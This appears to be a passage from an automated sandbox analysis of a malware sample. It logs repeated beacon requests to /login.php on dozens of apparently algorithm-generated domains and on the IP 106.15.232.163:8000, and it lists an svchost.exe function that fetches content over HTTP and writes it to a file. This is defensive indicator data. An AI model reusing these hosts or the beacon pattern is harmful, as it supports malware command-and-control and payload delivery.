Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_377283.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyrysor.com
Source: global trafficHTTP traffic detected: GET /dh/147287063_377283.html HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: 106.15.232.163:8000Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyxynyx.comCookie: __tad=1731347439.3564880
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vofycot.comCookie: __tad=1731347439.2338786
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyval.com
Source: global trafficHTTP traffic detected: GET /login.php?sub1=20241112-0450-5851-9938-0bdfa7f33a56 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww16.vofycot.comConnection: Keep-AliveCookie: __tad=1731347439.2338786
Source: global trafficHTTP traffic detected: GET /login.php?subid1=20241112-0450-586c-82c6-824410e64c84 HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: ww25.lyxynyx.comConnection: Keep-AliveCookie: __tad=1731347439.3564880; parking_session=b097eaca-ea1a-4a8d-8bee-a2968c7eba7b
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyhub.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347462|1731347428|17|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347428|1731347428|0|1|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347463|1731347428|17|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347465|1731347428|10|3|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347465|1731347428|18|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: www.gahyqah.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347473|1731347428|13|3|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: galyqaz.comCookie: vsid=903vr478893028933998491
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347473|1731347428|9|4|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347473|1731347428|13|3|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=1e890a73-ac3b-42d0-806f-39725fa4b723
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vonypom.comCookie: snkz=66.23.206.109; btst=540e8cd587688b22b6a34721957e6de0|66.23.206.109|1731347463|1731347428|17|2|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qetyfuv.comCookie: snkz=66.23.206.109; btst=4373610fafa62658a68c9dde6ca5d09a|66.23.206.109|1731347479|1731347428|7|5|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vocyzit.comCookie: snkz=66.23.206.109; btst=39d16f88231e9d77c030571879e36c23|66.23.206.109|1731347479|1731347428|9|4|0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lymyxid.comCookie: snkz=66.23.206.109; btst=3f95d6b3439c1d0f64626ac83ec297f1|66.23.206.109|1731347479|1731347428|9|4|0
Source: unknownTCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\apppatch\svchost.exeCode function: 2_2_02C839C0 memset,InternetOpenA,InternetConnectA,HttpOpenRequestA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,HttpAddRequestHeadersA,_snprintf,HttpAddRequestHeadersA,HttpSendRequestA,HttpQueryInfoA,CreateFileA,GetProcessHeap,GetProcessHeap,RtlAllocateHeap,memset,InternetReadFile,WriteFile,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,GetHandleInformation,CloseHandle,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_02C839C0
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lysyvan.comConnection: Keep-Alive
